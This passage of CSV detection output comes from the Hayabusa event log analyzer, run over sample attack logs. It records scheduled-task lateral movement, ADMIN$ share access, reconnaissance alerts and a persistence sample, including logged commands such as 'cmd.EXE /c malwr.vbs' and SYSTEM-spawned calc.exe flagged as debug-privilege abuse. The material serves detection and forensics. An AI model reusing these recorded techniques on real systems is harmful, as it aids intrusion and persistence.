+09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 
+2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.508 
+09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 56034 : LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : 
User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe C:\Windows\system32\CompatTelRunner.exe : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 
Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 
+09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: 
C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT 
